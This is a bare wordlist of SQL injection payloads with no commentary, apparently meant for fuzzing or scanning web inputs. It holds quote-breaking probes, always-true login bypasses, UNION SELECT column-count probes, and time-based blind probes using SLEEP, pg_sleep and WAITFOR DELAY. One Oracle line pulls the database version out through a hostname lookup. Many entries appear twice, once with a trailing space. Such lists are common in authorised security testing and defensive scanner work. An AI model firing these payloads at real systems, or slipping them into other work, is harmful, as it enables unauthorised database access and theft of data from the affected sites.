'
''
"
""
-1
-0
,111
,1
' OR '1'='1
' OR '1'='1' --
') OR ('1'='1
') OR '1'='1' --
" OR "1"="1
" OR "1"="1" --
') OR 1=1 --
1' AND '1'='1
1' AND SLEEP(3)='1
1) AND (SELECT 1 FROM (SELECT(SLEEP(3)))a) --
1' OR SLEEP(3) --
0) UNION SELECT NULL --
0) UNION SELECT 1,2 --
0) UNION SELECT 1,2,3 --
' UNION SELECT NULL --
' UNION SELECT 1,2 --
' UNION SELECT 1,2,3 --
') UNION SELECT NULL --
') UNION SELECT 1,2 --
') UNION SELECT 1,2,3 --
'||SLEEP(3)||'
'||UTL_INADDR.GET_HOST_NAME(''||(SELECT banner FROM v$version WHERE ROWNUM=1))||'
';WAITFOR DELAY '0:0:3'--
-1) OR 1=1 --
' AND 1=2 UNION SELECT NULL --
' AND 1=2 UNION SELECT 1,2 --
' AND 1=2 UNION SELECT 1,2,3 --
') AND '1'='2 UNION SELECT 1,2 --
' OR 'a'='a' /*
' OR 'a'='a' #
1 OR 1=1
1 OR 1=1--
1 OR SLEEP(3)
') OR SLEEP(3) AND ('1'='1
) OR pg_sleep(3)--
'||(SELECT pg_sleep(3))||'
') AND 1=(SELECT COUNT(*) FROM information_schema.tables)--
' OR '1'='1' -- 
') OR '1'='1' -- 
" OR "1"="1" -- 
') OR 1=1 -- 
1) AND (SELECT 1 FROM (SELECT(SLEEP(3)))a) -- 
1' OR SLEEP(3) -- 
0) UNION SELECT NULL -- 
0) UNION SELECT 1,2 -- 
0) UNION SELECT 1,2,3 -- 
' UNION SELECT NULL -- 
' UNION SELECT 1,2 -- 
' UNION SELECT 1,2,3 -- 
') UNION SELECT NULL -- 
') UNION SELECT 1,2 -- 
') UNION SELECT 1,2,3 -- 
-1) OR 1=1 -- 
' AND 1=2 UNION SELECT NULL -- 
' AND 1=2 UNION SELECT 1,2 -- 
' AND 1=2 UNION SELECT 1,2,3 -- 
') AND '1'='2 UNION SELECT 1,2 -- 
1 OR 1=1-- 
) OR pg_sleep(3)-- 
') AND 1=(SELECT COUNT(*) FROM information_schema.tables)-- 